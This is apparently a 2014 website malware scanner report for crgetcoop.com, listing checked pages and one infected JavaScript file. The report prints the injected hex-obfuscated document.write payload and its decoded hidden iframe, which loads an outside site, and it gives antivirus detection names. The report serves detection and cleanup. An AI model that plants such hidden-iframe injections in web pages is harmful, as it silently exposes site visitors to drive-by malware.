New scan:

Malware Scanner report for crgetcoop.com

Malicious/Suspicious/Total urls checked
1/0/16
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://crgetcoop.com/
HTTP/1.1 200 OK
Date: Wed, 17 Sep 2014 04:18:23 GMT
Accept-Ranges: bytes
ETag: "eed4c0e9183cf1:5b7"
Server: Microsoft-IIS/6.0
Content-Length: 1383
Content-Location: http://crgetcoop.com/index.html
Content-Type: text/html
Last-Modified: Mon, 09 Jun 2014 03:15:25 GMT
X-Powered-By: ASP.NET
clean
http://crgetcoop.com/index.html
200 OK
Content-Length: 1383
Content-Type: text/html
clean
http://crgetcoop.com/index.php
200 OK
Content-Length: 33154
Content-Type: text/html
clean
http://crgetcoop.com/adminweb/lib/popup.js
200 OK
Content-Length: 1282
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Popup(pname,purl,w,h,s){
LeftPosition = (screen.width) ? (screen.width-w-8)/2 : 0;
TopPosition = (screen.height) ? (screen.height-h-50)/2 : 0;
myWinName = window.open(purl,pname,"width="+w+",height="+h+",top="+TopPosition+",left="+LeftPosition+",resizable=no,scrollbars="+s);
if (parseInt(navigator.appVersion) >= 4) {
myWinName.window.focus();
}
return myWinName;
}











<
... 436 bytes are skipped ...
\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x61\x7A\x64\x61\x2E\x67\x65\x6F\x72\x67\x65\x77\x6B\x6F\x68\x6E\x2E\x63\x6F\x6D\x2F\x64\x69\x72\x65\x63\x74\x2E\x70\x68\x70\x3F\x70\x61\x67\x65\x3D\x31\x35\x66\x34\x38\x62\x65\x38\x34\x64\x36\x37\x36\x35\x34\x64\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x61\x6C\x6C\x6F\x77\x66\x75\x6C\x6C\x73\x63\x72\x65\x65\x6E\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x77\x72\x69\x74\x65"];document[_0x965b[1]](_0x965b[0]);

Decoded script:


<div name="youtube" style="display:none"><iframe width="560" height="315" src="http://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-inf
NANO-Antivirus
Trojan.Url.IframeB.bcufsr
GData
HTML:Iframe-inf
ESET-NOD32
HTML/Iframe.B.Gen

http://crgetcoop.com/interest.php
200 OK
Content-Length: 23738
Content-Type: text/html
clean
http://crgetcoop.com/upload/interesnews/thumbnail/154-6167.jpg
200 OK
Content-Length: 300704
Content-Type: image/jpeg
clean
http://crgetcoop.com/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://crgetcoop.com/upload/interesnews/thumbnail/153-3730.pdf
200 OK
Content-Length: 45691
Content-Type: application/pdf
clean
http://crgetcoop.com/upload/interesnews/thumbnail/152-3941.pdf
200 OK
Content-Length: 37743
Content-Type: application/pdf
clean
http://crgetcoop.com/upload/interesnews/thumbnail/151-9966.pdf
200 OK
Content-Length: 32200
Content-Type: application/pdf
clean
http://crgetcoop.com/upload/interesnews/thumbnail/150-9763.pdf
200 OK
Content-Length: 52733
Content-Type: application/pdf
clean
http://crgetcoop.com/upload/interesnews/thumbnail/149-6408.pdf
200 OK
Content-Length: 59437
Content-Type: application/pdf
clean
http://crgetcoop.com/upload/interesnews/thumbnail/148-5830.pdf
200 OK
Content-Length: 29088
Content-Type: application/pdf
clean
http://crgetcoop.com/upload/interesnews/thumbnail/147-5995.pdf
200 OK
Content-Length: 38839
Content-Type: application/pdf
clean
http://crgetcoop.com/upload/interesnews/thumbnail/146-3195.pdf
200 OK
Content-Length: 82254
Content-Type: application/pdf
clean
http://crgetcoop.com/upload/interesnews/thumbnail/145-7733.pdf
200 OK
Content-Length: 35093
Content-Type: application/pdf
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: crgetcoop.com

Result:
HTTP/1.1 200 OK
Date: Wed, 17 Sep 2014 04:18:23 GMT
Accept-Ranges: bytes
ETag: "eed4c0e9183cf1:5b7"
Server: Microsoft-IIS/6.0
Content-Length: 1383
Content-Location: http://crgetcoop.com/index.html
Content-Type: text/html
Last-Modified: Mon, 09 Jun 2014 03:15:25 GMT
X-Powered-By: ASP.NET

...1383 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: crgetcoop.com
Referer: http://www.google.com/search?q=crgetcoop.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=crgetcoop.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://crgetcoop.com/

Result: crgetcoop.com is not infected or malware details are not published yet.